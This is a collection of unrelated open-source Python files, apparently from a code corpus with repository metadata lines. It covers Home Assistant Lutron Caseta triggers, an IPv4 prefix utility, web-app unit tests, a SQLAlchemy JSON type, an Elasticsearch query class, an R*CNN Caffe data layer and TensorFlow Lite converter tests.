|
"""Provides device triggers for lutron caseta."""
from __future__ import annotations
from typing import Any
import voluptuous as vol
from homeassistant.components.automation import (
AutomationActionType,
AutomationTriggerInfo,
)
from homeassistant.components.device_automation import DEVICE_TRIGGER_BASE_SCHEMA
from homeassistant.components.device_automation.exceptions import (
InvalidDeviceAutomationConfig,
)
from homeassistant.components.homeassistant.triggers import event as event_trigger
from homeassistant.const import (
CONF_DEVICE_ID,
CONF_DOMAIN,
CONF_EVENT,
CONF_PLATFORM,
CONF_TYPE,
)
from homeassistant.core import CALLBACK_TYPE, HomeAssistant
from homeassistant.helpers.typing import ConfigType
from .const import (
ACTION_PRESS,
ACTION_RELEASE,
ATTR_ACTION,
ATTR_BUTTON_NUMBER,
ATTR_SERIAL,
BUTTON_DEVICES,
CONF_SUBTYPE,
DOMAIN,
LUTRON_CASETA_BUTTON_EVENT,
)
SUPPORTED_INPUTS_EVENTS_TYPES = [ACTION_PRESS, ACTION_RELEASE]
LUTRON_BUTTON_TRIGGER_SCHEMA = DEVICE_TRIGGER_BASE_SCHEMA.extend(
{
vol.Required(CONF_TYPE): vol.In(SUPPORTED_INPUTS_EVENTS_TYPES),
}
)
PICO_2_BUTTON_BUTTON_TYPES = {
"on": 2,
"off": 4,
}
PICO_2_BUTTON_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(PICO_2_BUTTON_BUTTON_TYPES),
}
)
PICO_2_BUTTON_RAISE_LOWER_BUTTON_TYPES = {
"on": 2,
"off": 4,
"raise": 5,
"lower": 6,
}
PICO_2_BUTTON_RAISE_LOWER_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(PICO_2_BUTTON_RAISE_LOWER_BUTTON_TYPES),
}
)
PICO_3_BUTTON_BUTTON_TYPES = {
"on": 2,
"stop": 3,
"off": 4,
}
PICO_3_BUTTON_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(PICO_3_BUTTON_BUTTON_TYPES),
}
)
PICO_3_BUTTON_RAISE_LOWER_BUTTON_TYPES = {
"on": 2,
"stop": 3,
"off": 4,
"raise": 5,
"lower": 6,
}
PICO_3_BUTTON_RAISE_LOWER_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(PICO_3_BUTTON_RAISE_LOWER_BUTTON_TYPES),
}
)
PICO_4_BUTTON_BUTTON_TYPES = {
"button_1": 8,
"button_2": 9,
"button_3": 10,
"button_4": 11,
}
PICO_4_BUTTON_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(PICO_4_BUTTON_BUTTON_TYPES),
}
)
PICO_4_BUTTON_ZONE_BUTTON_TYPES = {
"on": 8,
"raise": 9,
"lower": 10,
"off": 11,
}
PICO_4_BUTTON_ZONE_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(PICO_4_BUTTON_ZONE_BUTTON_TYPES),
}
)
PICO_4_BUTTON_SCENE_BUTTON_TYPES = {
"button_1": 8,
"button_2": 9,
"button_3": 10,
"off": 11,
}
PICO_4_BUTTON_SCENE_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(PICO_4_BUTTON_SCENE_BUTTON_TYPES),
}
)
PICO_4_BUTTON_2_GROUP_BUTTON_TYPES = {
"group_1_button_1": 8,
"group_1_button_2": 9,
"group_2_button_1": 10,
"group_2_button_2": 11,
}
PICO_4_BUTTON_2_GROUP_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(PICO_4_BUTTON_2_GROUP_BUTTON_TYPES),
}
)
FOUR_GROUP_REMOTE_BUTTON_TYPES = {
"open_all": 2,
"stop_all": 3,
"close_all": 4,
"raise_all": 5,
"lower_all": 6,
"open_1": 10,
"stop_1": 11,
"close_1": 12,
"raise_1": 13,
"lower_1": 14,
"open_2": 18,
"stop_2": 19,
"close_2": 20,
"raise_2": 21,
"lower_2": 22,
"open_3": 26,
"stop_3": 27,
"close_3": 28,
"raise_3": 29,
"lower_3": 30,
"open_4": 34,
"stop_4": 35,
"close_4": 36,
"raise_4": 37,
"lower_4": 38,
}
FOUR_GROUP_REMOTE_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(FOUR_GROUP_REMOTE_BUTTON_TYPES),
}
)
DEVICE_TYPE_SCHEMA_MAP = {
"Pico2Button": PICO_2_BUTTON_TRIGGER_SCHEMA,
"Pico2ButtonRaiseLower": PICO_2_BUTTON_RAISE_LOWER_TRIGGER_SCHEMA,
"Pico3Button": PICO_3_BUTTON_TRIGGER_SCHEMA,
"Pico3ButtonRaiseLower": PICO_3_BUTTON_RAISE_LOWER_TRIGGER_SCHEMA,
"Pico4Button": PICO_4_BUTTON_TRIGGER_SCHEMA,
"Pico4ButtonScene": PICO_4_BUTTON_SCENE_TRIGGER_SCHEMA,
"Pico4ButtonZone": PICO_4_BUTTON_ZONE_TRIGGER_SCHEMA,
"Pico4Button2Group": PICO_4_BUTTON_2_GROUP_TRIGGER_SCHEMA,
"FourGroupRemote": FOUR_GROUP_REMOTE_TRIGGER_SCHEMA,
}
DEVICE_TYPE_SUBTYPE_MAP = {
"Pico2Button": PICO_2_BUTTON_BUTTON_TYPES,
"Pico2ButtonRaiseLower": PICO_2_BUTTON_RAISE_LOWER_BUTTON_TYPES,
"Pico3Button": PICO_3_BUTTON_BUTTON_TYPES,
"Pico3ButtonRaiseLower": PICO_3_BUTTON_RAISE_LOWER_BUTTON_TYPES,
"Pico4Button": PICO_4_BUTTON_BUTTON_TYPES,
"Pico4ButtonScene": PICO_4_BUTTON_SCENE_BUTTON_TYPES,
"Pico4ButtonZone": PICO_4_BUTTON_ZONE_BUTTON_TYPES,
"Pico4Button2Group": PICO_4_BUTTON_2_GROUP_BUTTON_TYPES,
"FourGroupRemote": FOUR_GROUP_REMOTE_BUTTON_TYPES,
}
TRIGGER_SCHEMA = vol.Any(
PICO_2_BUTTON_TRIGGER_SCHEMA,
PICO_3_BUTTON_RAISE_LOWER_TRIGGER_SCHEMA,
PICO_4_BUTTON_TRIGGER_SCHEMA,
PICO_4_BUTTON_SCENE_TRIGGER_SCHEMA,
PICO_4_BUTTON_ZONE_TRIGGER_SCHEMA,
PICO_4_BUTTON_2_GROUP_TRIGGER_SCHEMA,
FOUR_GROUP_REMOTE_TRIGGER_SCHEMA,
)
async def async_validate_trigger_config(hass: HomeAssistant, config: ConfigType):
"""Validate config."""
# if device is available verify parameters against device capabilities
device = get_button_device_by_dr_id(hass, config[CONF_DEVICE_ID])
if not device:
return config
schema = DEVICE_TYPE_SCHEMA_MAP.get(device["type"])
if not schema:
raise InvalidDeviceAutomationConfig(
f"Device type {device['type']} not supported: {config[CONF_DEVICE_ID]}"
)
return schema(config)
async def async_get_triggers(
hass: HomeAssistant, device_id: str
) -> list[dict[str, Any]]:
"""List device triggers for lutron caseta devices."""
triggers = []
device = get_button_device_by_dr_id(hass, device_id)
if not device:
raise InvalidDeviceAutomationConfig(f"Device not found: {device_id}")
valid_buttons = DEVICE_TYPE_SUBTYPE_MAP.get(device["type"], [])
for trigger in SUPPORTED_INPUTS_EVENTS_TYPES:
for subtype in valid_buttons:
triggers.append(
{
CONF_PLATFORM: "device",
CONF_DEVICE_ID: device_id,
CONF_DOMAIN: DOMAIN,
CONF_TYPE: trigger,
CONF_SUBTYPE: subtype,
}
)
return triggers
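# Illustratively, for a Pico3ButtonRaiseLower remote one returned trigger resolves to
# something like (string values of the imported constants are assumed, not shown here):
#   {"platform": "device", "device_id": "<registry id>", "domain": "lutron_caseta",
#    "type": "press", "subtype": "lower"}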
async def async_attach_trigger(
hass: HomeAssistant,
config: ConfigType,
action: AutomationActionType,
automation_info: AutomationTriggerInfo,
|
) -> CALLBACK_TYPE:
"""Attach a trigger."""
device = get_button_device_by_dr_id(hass, config[CONF_DEVICE_ID])
schema = DEVICE_TYPE_SCHEMA_MAP.get(device["type"])
valid_buttons = DEVICE_TYPE_SUBTYPE_MAP.get(device["type"])
config = schema(config)
|
event_config = {
event_trigger.CONF_PLATFORM: CONF_EVENT,
event_trigger.CONF_EVENT_TYPE: LUTRON_CASETA_BUTTON_EVENT,
event_trigger.CONF_EVENT_DATA: {
ATTR_SERIAL: device["serial"],
ATTR_BUTTON_NUMBER: valid_buttons[config[CONF_SUBTYPE]],
ATTR_ACTION: config[CONF_TYPE],
},
}
event_config = event_trigger.TRIGGER_SCHEMA(event_config)
return await event_trigger.async_attach_trigger(
hass, event_config, action, automation_info, platform_type="device"
)
def get_button_device_by_dr_id(hass: HomeAssistant, device_id: str):
"""Get a lutron device for the given device id."""
if DOMAIN not in hass.data:
return None
for config_entry in hass.data[DOMAIN]:
button_devices = hass.data[DOMAIN][config_entry][BUTTON_DEVICES]
device = button_devices.get(device_id)
if device:
return device
return None
|
jhanley634/testing-tools
|
problem/weblog/prefix/ip_addr.py
|
Python
|
mit
| 5,425
| 0.00129
|
# Copyright 2020 John Hanley.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# The software is provided "AS IS", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall
# the authors or copyright holders be liable for any claim, damages or
# other liability, whether in an action of contract, tort or otherwise,
# arising from, out of or in connection with the software or the use or
# other dealings in the software.
from functools import lru_cache, total_ordering
import re
@total_ordering
class IpAddr:
"""Models an IPv4 32-bit address."""
dotted_quad_re = re.compile(r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$")
def __init__(self, dotted_quad):
if isinstance(dotted_quad, IpAddr):
dotted_quad = dotted_quad.decimal()
m = self.dotted_quad_re.search(dotted_quad)
assert m, dotted_quad # Input must be a valid decimal IPv4 address.
four_bytes = map(int, dotted_quad.split("."))
self.addr = self._combine(four_bytes)
@staticmethod
def _combine(nums):
acc = 0
for num in nums:
assert 0 <= num < 0x100, num
acc *= 0x100
acc += num
return acc
def _get_addr_bytes(self):
a = self.addr
bytes = []
for _ in range(4):
bytes.append(a & 0xFF)
a //= 0x100
return reversed(bytes)
def __str__(self):
return f"{self.addr:08x}"
def hex(self):
return self.__str__()
def decimal(self):
return ".".join(map(str, self._get_addr_bytes()))
def decimal03(self):
"""Returns e.g. 001.002.003.004. Lexical and numeric collations match."""
return ".".join([f"{b:03d}"
for b in self._get_addr_bytes()])
# from https://docs.python.org/3/library/functools.html#functools.total_ordering
@staticmethod
def _is_valid_operand(other):
return (hasattr(other, "addr")
and isinstance(other.addr, int)
and other.addr >= 0)
@classmethod
def _invalid(cls, other):
if cls._is_valid_operand(other):
return None # We can keep going.
else:
return NotImplemented # Prohibit further processing.
def __eq__(self, other):
return self._invalid(other) or self.addr == other.addr
def __lt__(self, other):
return self._invalid(other) or self.addr < other.addr
@total_ordering
class Prefix:
"""Models an IPv4 CIDR prefix: 32-bit address + mask."""
def __init__(self, ip: IpAddr, masklen=None):
if isinstance(ip, str) and "/" in ip:
ip, masklen = ip.split("/")
self.masklen = int(masklen)
assert 0 <= self.masklen <= 32, masklen
self.ip = IpAddr(ip)
self.ip.addr &= self.mask() # Canonicalize. Host part must be all zero.
def __str__(self):
return self.ip.decimal() + f"/{self.masklen}"
@staticmethod
@lru_cache()
def _mask(masklen: int):
# net_bits = masklen # network part, e.g. 24 in a class C
# host_bits = 32 - net_bits # host part, e.g. 8 in a class C
net_mask = 0
bit_val = 2 ** 32 # Start with MSB.
for _ in range(masklen):
bit_val //= 2 # Right shift one position.
net_mask |= bit_val
return net_mask
def mask(self):
return self._mask(self.masklen)
def __contains__(self, item: IpAddr):
a1 = self.ip.addr & self.mask()
a2 = item.addr & self.mask()
return a1 == a2
@staticmethod
def _is_valid_operand(other): # Other is a prefix that has an IP, and a mask.
return (hasattr(other, 'ip')
and IpAddr._is_valid_operand(other.ip)
and hasattr(other, 'masklen')
and 0 <= other.masklen <= 32)
@classmethod
def _invalid(cls, other):
if cls._is_valid_operand(other):
|
return None # We can keep going.
|
else:
return NotImplemented # Prohibit further processing.
def __eq__(self, other):
return self._invalid(other) or (self.ip.addr, self.masklen) == (other.ip.addr, other.masklen)
def __lt__(self, other):
return self._invalid(other) or (self.ip.addr, self.masklen) < (other.ip.addr, other.masklen)
def log_dist(a: IpAddr, b: IpAddr):
"""Finds the distance beween IPs, according to a logarithmic distance metric."""
prefix = Prefix(b, 32)
while (prefix.masklen > 0
and a not in prefix):
assert b in prefix, (b, prefix)
prefix.masklen -= 1
assert b in prefix, (b, prefix)
assert a in prefix, (a, prefix)
assert 0 <= prefix.masklen <= 32
log_distance = 32 - prefix.masklen
return log_distance
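# Minimal usage sketch (not part of the original module):
if __name__ == "__main__":
    a = IpAddr("10.0.0.1")
    b = IpAddr("10.0.0.2")
    assert a in Prefix("10.0.0.0/30")   # containment via the Prefix mask
    assert log_dist(a, b) == 2          # the addresses share a /30 prefix
    assert log_dist(a, a) == 0          # identical addresses are at distance 0
    print(a.decimal03())                # -> 010.000.000.001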
|
Samnsparky/cdibase
|
prog_code/controller/enter_data_controllers_test.py
|
Python
|
gpl-3.0
| 28,902
| 0.001799
|
"""Automated tests for entering CDI forms manually.
Copyright (C) 2014 A. Samuel Pottinger ("Sam Pottinger", gleap.org)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
# Do not type check in tests
# type: ignore
import collections
import copy
import datetime
import json
import unittest
import unittest.mock
import cdibase
from ..struct import models
from ..util import constants
from ..util import db_util
from ..util import filter_util
from ..util import math_util
from ..util import recalc_util
from ..util import user_util
TEST_EMAIL = 'test.email@example.com'
TEST_DB_ID = '1'
TEST_USER = models.User(
TEST_DB_ID,
TEST_EMAIL,
None,
True,
False,
False,
False,
False,
False,
False,
False
)
MALE_TEST_PERCENTILE_NAME = 'male_test_percentiles'
FEMALE_TEST_PERCENTILE_NAME = 'female_test_percentiles'
OTHER_TEST_PERCENTILE_NAME = 'other_test_percentiles'
TEST_CDI_FORMAT_NAME = 'standard'
TEST_FORMAT = models.CDIFormat(
'standard',
'standard',
'standard.yaml',
{
'categories': [
{
'words':['cat_1_word_1', 'cat_1_word_2', 'cat_1_word_3'],
'language': 'english'
},
{
'words':['cat_2_word_1', 'cat_2_word_2', 'cat_2_word_3'],
'language': 'english'
}
],
'percentiles': {
'male': MALE_TEST_PERCENTILE_NAME,
'female': FEMALE_TEST_PERCENTILE_NAME,
'other': OTHER_TEST_PERCENTILE_NAME
},
'options': [
{'name': 'said', 'value': 1},
{'name': 'not said', 'value': 0}
],
'count_as_spoken': [1],
'meta': {'cdi_type': 'standard'}
}
)
TEST_STUDY_ID = '456'
TEST_STUDY_ID_2 = '789'
TEST_SNAPSHOT_ID = 789
TEST_ITEMS_EXCLUDED = 3
TEST_EXTRA_CATEGORIES = 4
TEST_SESSION_NUM = 4
TEST_LANGUAGES = ['english']
TEST_NUM_LANGUAGES = 1
TEST_HARD_OF_HEARING = False
TEST_STUDY = 'test study'
TEST_STUDY_2 = 'test study 2'
TEST_BIRTHDAY = '2011/09/12'
TEST_BIRTHDAY_DATE = datetime.date(2011, 9, 12)
TEST_SESSION = '2013/09/12'
TEST_TOTAL_NUM_SESSIONS = 48
TEST_AGE = 21
TEST_PERCENTILE = 50
TEST_PERCENTILE_MODEL_CLS = collections.namedtuple(
'TestPercentileModel',
['details']
)
TEST_PERCENTILE_MODEL = TEST_PERCENTILE_MODEL_CLS('test details')
TEST_SUCCESSFUL_PARAMS = {
'global_id': TEST_DB_ID,
'study_id': TEST_STUDY_ID,
'study': TEST_STUDY,
'gender': constants.MALE,
'age': TEST_AGE,
'birthday': TEST_BIRTHDAY,
'session_date': TEST_SESSION,
'session_num': TEST_SESSION_NUM,
'items_excluded': TEST_ITEMS_EXCLUDED,
'extra_categories': TEST_EXTRA_CATEGORIES,
'total_num_sessions': TEST_TOTAL_NUM_SESSIONS,
'hard_of_hearing': 'off',
'cat_1_word_1_report': '1',
'cat_1_word_2_report': '0',
'cat_1_word_3_report': '1',
'cat_2_word_1_report': '0',
'cat_2_word_2_report': '1',
'cat_2_word_3_report': '0'
}
TEST_EXPECTED_SNAPSHOT = models.SnapshotMetadata(
None,
TEST_DB_ID,
TEST_STUDY_ID,
TEST_STUDY,
constants.MALE,
TEST_AGE,
TEST_BIRTHDAY,
TEST_SESSION,
TEST_SESSION_NUM,
TEST_TOTAL_NUM_SESSIONS,
3,
TEST_ITEMS_EXCLUDED,
TEST_PERCENTILE,
TEST_EXTRA_CATEGORIES,
0,
TEST_LANGUAGES,
TEST_NUM_LANGUAGES,
'standard',
constants.EXPLICIT_FALSE,
False
)
TEST_EXPECTED_SNAPSHOT_2 = models.SnapshotMetadata(
None,
TEST_DB_ID,
TEST_STUDY_ID_2,
TEST_STUDY_2,
constants.MALE,
TEST_AGE,
TEST_BIRTHDAY,
TEST_SESSION,
TEST_SESSION_NUM,
|
TEST_TOTAL_NUM_SESSIONS,
3,
TEST_ITEMS_EXCLUDED,
TEST_PERCENTILE,
TEST_EXTRA_CATEGORIES,
0,
TEST_LANGUAGES,
TEST_NUM_LANGUAGES,
'standard',
constants.EXPLICIT_FALSE,
False
)
TEST_EXPECTED_WORD_ENTRIES = {
|
'cat_1_word_1': 1,
'cat_1_word_2': 0,
'cat_1_word_3': 1,
'cat_2_word_1': 0,
'cat_2_word_2': 1,
'cat_2_word_3': 0
}
class EnterDataControllersTests(unittest.TestCase):
def setUp(self):
self.app = cdibase.app
self.app.debug = True
self.__callback_called = False
def __run_with_mocks(self, on_start, body, on_end):
with unittest.mock.patch('prog_code.util.user_util.get_user') as mock_get_user:
with unittest.mock.patch('prog_code.util.db_util.load_cdi_model') as mock_load_cdi_model:
with unittest.mock.patch('prog_code.util.db_util.insert_snapshot') as mock_insert_snapshot:
with unittest.mock.patch('prog_code.util.db_util.report_usage') as mock_report_usage:
with unittest.mock.patch('prog_code.util.db_util.load_percentile_model') as mock_load_percentile_model:
with unittest.mock.patch('prog_code.util.math_util.find_percentile') as mock_find_percentile:
with unittest.mock.patch('prog_code.util.filter_util.run_search_query') as mock_run_search_query:
with unittest.mock.patch('prog_code.util.db_util.lookup_global_participant_id') as mock_lookup_global_participant_id:
with unittest.mock.patch('prog_code.util.db_util.update_participant_metadata') as mock_update_participant_metadata:
with unittest.mock.patch('prog_code.util.recalc_util.recalculate_ages_and_percentiles') as mock_recalculate_ages_and_percentiles:
with unittest.mock.patch('prog_code.util.db_util.load_cdi_model_listing') as mock_load_cdi_model_listing:
mocks = {
'get_user': mock_get_user,
'load_cdi_model': mock_load_cdi_model,
'insert_snapshot': mock_insert_snapshot,
'report_usage': mock_report_usage,
'load_percentile_model': mock_load_percentile_model,
'find_percentile': mock_find_percentile,
'run_search_query': mock_run_search_query,
'lookup_global_participant_id': mock_lookup_global_participant_id,
'update_participant_metadata': mock_update_participant_metadata,
'recalculate_ages_and_percentiles': mock_recalculate_ages_and_percentiles,
'load_cdi_model_listing': mock_load_cdi_model_listing
}
on_start(mocks)
body()
on_end(mocks)
self.__callback_called = True
def __default_on_start(self, mocks):
mocks['get_user'].return_value = TEST_USER
mocks['load_cdi_model'].return_value = TEST_FORMAT
def __default_on_end(self, mocks):
mocks['get_user'].assert_called_with(TEST_EMAIL)
mocks['load_cdi_model'].assert_called_with(TEST_CDI_FORMAT_NAME)
def __run_with_default_mocks(self, body):
self.__run_with_mocks(
lamb
|
zxytim/pynojo
|
pynojo/model/_ext_type.py
|
Python
|
gpl-3.0
| 2,330
| 0.003863
|
# $File: _ext_type.py
# $Date: Wed Feb 22 15:04:06 2012 +0800
#
# Copyright (C) 2012 the pynojo development team <see AUTHORS file>
#
# Contributors to this file:
# Kai Jia <jia.kai66@gmail.com>
#
# This file is part of pynojo
#
# pynojo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# pynojo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with pynojo. If not, see <http://www.gnu.org/licenses/>.
#
"""Extra SQLAlchemy ORM types"""
__all__ = ['JSONEncodeDict']
import cjson
from sqlalchemy.types import TypeDecorator, String
from sqlalchemy.ext.mutable import Mutable
from pynojo.exc import PynojoRuntimeError
|
class JSONEncodeDict(TypeDecorator):
"""Represents an mutable python *dict* as a json-encoded string."""
# pylint: disable=W0223
impl = String
def process_bind_param(self, value, dialect):
if value is not None:
value = cjson.encode(value)
if len(value) > self.length:
raise PynojoRuntimeError(_(
'{class_name}: encoded string too long',
class_name = self.__class__.__name__))
return value
def process_result_value(self, value, dialect):
if value is not None:
value = cjson.decode(value)
return value
class _JSONEncodeDictMutabilize(Mutable, dict):
@classmethod
def coerce(cls, key, value):
if not isinstance(value, _JSONEncodeDictMutabilize):
if isinstance(value, dict):
return _JSONEncodeDictMutabilize(value)
return Mutable.coerce(key, value)
else:
return value
def __setitem__(self, key, value):
dict.__setitem__(self, key, value)
self.changed()
def __delitem__(self, key):
dict.__delitem__(self, key)
self.changed()
_JSONEncodeDictMutabilize.associate_with(JSONEncodeDict)
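# Illustrative column declaration (a sketch, not part of the original module):
#   from sqlalchemy import Column
#   class Example(Base):
#       extra = Column(JSONEncodeDict(1024))   # stores a mutable dict as JSON text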
|
jlinn/pylastica
|
pylastica/query/matchall.py
|
Python
|
apache-2.0
| 180
| 0.005556
|
__author__ = 'Joe Linn'
from . import abstract
class MatchAll(abstract.AbstractQuery):
|
def __init__(self):
|
super(MatchAll, self).__init__()
self._params = {}
|
gkioxari/RstarCNN
|
lib/attr_data_layer/layer.py
|
Python
|
bsd-2-clause
| 5,647
| 0.000708
|
# --------------------------------------------------------
# Fast R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
# --------------------------------------------------------
# R*CNN
# Written by Georgia Gkioxari, 2015.
# See LICENSE in the project root for license information.
# --------------------------------------------------------
"""The data layer used during training to train a R*CNN network.
AttributesDataLayer implements a Caffe Python layer.
"""
import caffe
from fast_rcnn.config import cfg
from attr_data_layer.minibatch import get_minibatch
import numpy as np
import yaml
from multiprocessing import Process, Queue
# import pdb
class AttributesDataLayer(caffe.Layer):
"""R*CNN data layer used during training for attributes."""
def _shuffle_roidb_inds(self):
"""Randomly permute the training roidb."""
self._perm = np.random.permutation(np.arange(len(self._roidb)))
self._cur = 0
def _get_next_minibatch_inds(self):
"""Return the roidb indices for the next minibatch."""
if self._cur + cfg.TRAIN.IMS_PER_BATCH >= len(self._roidb):
self._shuffle_roidb_inds()
db_inds = self._perm[self._cur:self._cur + cfg.TRAIN.IMS_PER_BATCH]
self._cur += cfg.TRAIN.IMS_PER_BATCH
return db_inds
def _get_next_minibatch(self):
"""Return the blobs to be used for the next minibatch.
If cfg.TRAIN.USE_PREFETCH is True, then blobs will be computed in a
separate process and made available through self._blob_queue.
"""
if cfg.TRAIN.USE_PREFETCH:
return self._blob_queue.get()
else:
db_inds = self._get_next_minibatch_inds()
minibatch_db = [self._roidb[i] for i in db_inds]
return get_minibatch(minibatch_db, self._num_classes)
def set_roidb(self, roidb):
"""Set the roidb to be used by this layer during training."""
self._roidb = roidb
self._shuffle_roidb_inds()
if cfg.TRAIN.USE_PREFETCH:
self._blob_queue = Queue(10)
self._prefetch_process = BlobFetcher(self._blob_queue,
self._roidb,
self._num_classes)
self._prefetch_process.start()
# Terminate the child process when the parent exits
def cleanup():
print 'Terminating BlobFetcher'
self._prefetch_process.terminate()
self._prefetch_process.join()
import atexit
atexit.register(cleanup)
def setup(self, bottom, top):
"""Setup the RoIDataLayer."""
# parse the layer parameter string, which must be valid YAML
|
layer_params = yaml.load(self.param_str_)
self._num_classes = layer_params['num_classes']
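# The layer's param_str is YAML, e.g. a prototxt entry along the lines of
# param_str: "'num_classes': 21" (illustrative value, not taken from this file)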
self._name_to_top_map = {
'data': 0,
'rois': 1,
'labels': 2}
# data blob: holds a batch of N images, each with 3 channels
# The height and width (100 x 100) are dummy values
top[0].reshape(1, 3, 100, 100)
# rois blob: holds R regions of interest, each is a 5-tuple
|
# (n, x1, y1, x2, y2) specifying an image batch index n and a
# rectangle (x1, y1, x2, y2)
top[1].reshape(1, 5)
# labels blob: holds labels for each attribute
top[2].reshape(1, self._num_classes)
def forward(self, bottom, top):
"""Get blobs and copy them into this layer's top blob vector."""
blobs = self._get_next_minibatch()
for blob_name, blob in blobs.iteritems():
top_ind = self._name_to_top_map[blob_name]
# Reshape net's input blobs
top[top_ind].reshape(*(blob.shape))
# Copy data into net's input blobs
top[top_ind].data[...] = blob.astype(np.float32, copy=False)
def backward(self, top, propagate_down, bottom):
"""This layer does not propagate gradients."""
pass
def reshape(self, bottom, top):
"""Reshaping happens during the call to forward."""
pass
class BlobFetcher(Process):
"""Experimental class for prefetching blobs in a separate process."""
def __init__(self, queue, roidb, num_classes):
super(BlobFetcher, self).__init__()
self._queue = queue
self._roidb = roidb
self._num_classes = num_classes
self._perm = None
self._cur = 0
self._shuffle_roidb_inds()
# fix the random seed for reproducibility
np.random.seed(cfg.RNG_SEED)
def _shuffle_roidb_inds(self):
"""Randomly permute the training roidb."""
# TODO(rbg): remove duplicated code
self._perm = np.random.permutation(np.arange(len(self._roidb)))
self._cur = 0
def _get_next_minibatch_inds(self):
"""Return the roidb indices for the next minibatch."""
# TODO(rbg): remove duplicated code
if self._cur + cfg.TRAIN.IMS_PER_BATCH >= len(self._roidb):
self._shuffle_roidb_inds()
db_inds = self._perm[self._cur:self._cur + cfg.TRAIN.IMS_PER_BATCH]
self._cur += cfg.TRAIN.IMS_PER_BATCH
return db_inds
def run(self):
print 'BlobFetcher started'
while True:
db_inds = self._get_next_minibatch_inds()
minibatch_db = [self._roidb[i] for i in db_inds]
blobs = get_minibatch(minibatch_db, self._num_classes)
self._queue.put(blobs)
|
xodus7/tensorflow
|
tensorflow/contrib/lite/python/lite_test.py
|
Python
|
apache-2.0
| 45,063
| 0.003107
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for lite.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tempfile
import numpy as np
from tensorflow.contrib.lite.python import lite
from tensorflow.contrib.lite.python import lite_constants
from tensorflow.contrib.lite.python.interpreter import Interpreter
from tensorflow.python import keras
from tensorflow.python.client import session
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops.variables import global_variables_initializer as _global_variables_initializer
from tensorflow.python.platform import gfile
from tensorflow.python.platform import resource_loader
from tensorflow.python.platform import test
from tensorflow.python.saved_model import saved_model
from tensorflow.python.training.training_util import write_graph
class FromConstructor(test_util.TensorFlowTestCase):
# Tests invalid constructors using a dummy value for the GraphDef.
def testInvalidConstructor(self):
message = ('If input_tensors and output_tensors are None, both '
'input_arrays_with_shape and output_arrays must be defined.')
# `output_arrays` is not defined.
with self.assertRaises(ValueError) as error:
lite.TocoConverter(
None, None, [], input_arrays_with_shape=[('input', [3, 9])])
self.assertEqual(message, str(error.exception))
# `input_arrays_with_shape` is not defined.
with self.assertRaises(ValueError) as error:
lite.TocoConverter(None, [], None, output_arrays=['output'])
self.assertEqual(message, str(error.exception))
# Tests valid constructors using a dummy value for the GraphDef.
def testValidConstructor(self):
converter = lite.TocoConverter(
None,
None,
None,
input_arrays_with_shape=[('input', [3, 9])],
output_arrays=['output'])
self.assertFalse(converter._has_valid_tensors())
self.assertEqual(converter.get_input_arrays(), ['input'])
with self.assertRaises(ValueError) as error:
converter._set_batch_size(1)
self.assertEqual(
'The batch size cannot be set for this model. Please use '
'input_shapes parameter.', str(error.exception))
converter = lite.TocoConverter(None, ['input_tensor'], ['output_tensor'])
self.assertTrue(converter._has_valid_tensors())
class FromSessionTest(test_util.TensorFlowTestCase):
def testFloat(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
